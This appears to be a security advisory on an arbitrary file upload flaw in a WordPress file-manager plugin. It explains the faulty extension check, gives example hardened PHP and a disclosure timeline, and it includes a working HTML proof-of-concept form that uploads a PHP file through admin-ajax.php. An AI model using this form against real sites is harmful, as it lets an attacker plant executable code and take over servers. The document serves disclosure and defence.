19 Sep

Arbitrary File Upload Vulnerability in Front end file upload and manager Plugin

After discovering an arbitrary file upload vulnerability in the plugin N-Media Post Front-end Form recently, we took a look at other plugins from the same developer and found that three others shared the same vulnerable code. One of those is the Front end file upload and manager Plugin.

In the case of this plugin, unlike the other plugin, the developer had actually tried to restrict what kinds of files could be uploaded:

/* ========== Invalid File type checking ========== */
// The name being checked is taken from the request, not from the uploaded file
$file_type = wp_check_filetype($_REQUEST ["name"], null );
// With the default (empty) setting this is array('')
$allowed_types = explode(',', $this->get_option('_file_types'));
// Loose comparison: false == '' is true, so an unrecognised extension passes
if( !in_array($file_type['ext'], $allowed_types) ){
	$response ['status'] = 'error';
	$response ['message'] = __ ( 'File type not valid', 'nm-filemanager' );
	die ( json_encode($response) );
}
/* ========== Invalid File type checking ========== */

The problem is that in the plugin’s default state the check doesn’t work for .php files, which seems to be more WordPress’ fault than the developer’s. The plugin gets the extension of the file to be uploaded with WordPress’ wp_check_filetype() function. What that function’s documentation doesn’t mention is that it only returns the file’s extension and type when the extension is one WordPress permits to be uploaded; for anything else, .php included, both values come back as false. The plugin’s code then checks whether the extension is one allowed by the plugin’s settings and exits if it isn’t. Since by default no extensions are set to be allowed, that list consists of the single empty string explode() produces from an empty setting, and in_array()’s loose comparison treats false as equal to the empty string, so the .php file is seen as allowed and is uploaded. Note also that the name being checked comes from the request’s name parameter rather than from the uploaded file itself.
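To make the failure concrete, here is an added example; it is not code from the plugin or from WordPress. The stand-in check_filetype_like_wp() mirrors the documented behaviour of wp_check_filetype() (an extension is returned only when the file name matches an allowed MIME entry, otherwise both values are false) over a constructed three-entry MIME table. vulnerable_check() reproduces the plugin’s logic as quoted above, and hardened_check() is one way to fix it: reject anything WordPress would not accept, treat an empty setting as allowing nothing, and compare extensions strictly and case-insensitively. The function names, the MIME table and the test cases are all assumptions made for this example.

```php
<?php
// Added example, not the plugin's or WordPress' code.

// Stand-in for wp_check_filetype(): returns the matching extension and MIME
// type, or false for both when no allowed entry matches. $mimes is a
// constructed subset of what WordPress allows by default.
function check_filetype_like_wp(string $filename, array $mimes): array {
    $type = false;
    $ext  = false;
    foreach ($mimes as $ext_preg => $mime_match) {
        if (preg_match('!\.(' . $ext_preg . ')$!i', $filename, $m)) {
            $type = $mime_match;
            $ext  = $m[1];
            break;
        }
    }
    return compact('ext', 'type');
}

$mimes = [
    'jpg|jpeg|jpe' => 'image/jpeg',
    'png'          => 'image/png',
    'pdf'          => 'application/pdf',
];

// The plugin's check as quoted above. $setting stands in for the
// '_file_types' option, which is an empty string by default.
function vulnerable_check(string $name, string $setting, array $mimes): bool {
    $file_type     = check_filetype_like_wp($name, $mimes);
    $allowed_types = explode(',', $setting);            // '' -> ['']
    return in_array($file_type['ext'], $allowed_types); // loose: false == '' is true
}

// Hardened check: an extension WordPress rejects is rejected here too, an
// empty setting allows nothing, and the comparison is strict (===) after
// normalising case on both sides.
function hardened_check(string $name, string $setting, array $mimes): bool {
    $file_type = check_filetype_like_wp($name, $mimes);
    if ($file_type['ext'] === false) {
        return false;
    }
    $allowed_types = array_filter(array_map('trim', explode(',', $setting)), 'strlen');
    if ($allowed_types === []) {
        return false;
    }
    return in_array(strtolower($file_type['ext']), array_map('strtolower', $allowed_types), true);
}

// Constructed cases: the PoC file name with and without a configured list,
// plus a legitimate image to show the loose check also misbehaves on case.
$cases = [
    ['upload.php', ''],
    ['upload.php', 'jpg,png'],
    ['photo.JPG',  ''],
    ['photo.JPG',  'jpg,png'],
];
foreach ($cases as [$name, $setting]) {
    printf("%-11s setting=%-9s vulnerable=%-5s hardened=%s\n",
        $name, "'$setting'",
        vulnerable_check($name, $setting, $mimes) ? 'allow' : 'deny',
        hardened_check($name, $setting, $mimes) ? 'allow' : 'deny');
}
```

Run with php on the command line. With the empty default setting the vulnerable check allows upload.php while denying photo.JPG; once a list such as jpg,png is configured, false no longer compares equal to any entry and upload.php is denied, but the case-sensitive comparison still rejects photo.JPG. The hardened check denies upload.php in both cases and allows photo.JPG only when jpg is configured. Separately from the extension check, the name used for the stored file should be derived server-side from the validated upload rather than taken from the client-supplied name parameter.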

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/user_uploads/ as upload.php.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="nm_filemanager_upload_file" />
<input type="hidden" name="name" value="upload.php" />
<input type="file" name="file" />
<input type="submit" value="Submit request" />
</form>


  • 7/16/2016 – Developer notified.
  • 7/16/2016 – Developer responds.
  • 9/19/2016 – WordPress.org Plugin Directory notified.
  • 9/21/2016 – Plugin removed from WordPress.org Plugin Directory.
  • 9/24/2016 – Version 4.0 released, which fixes vulnerability.
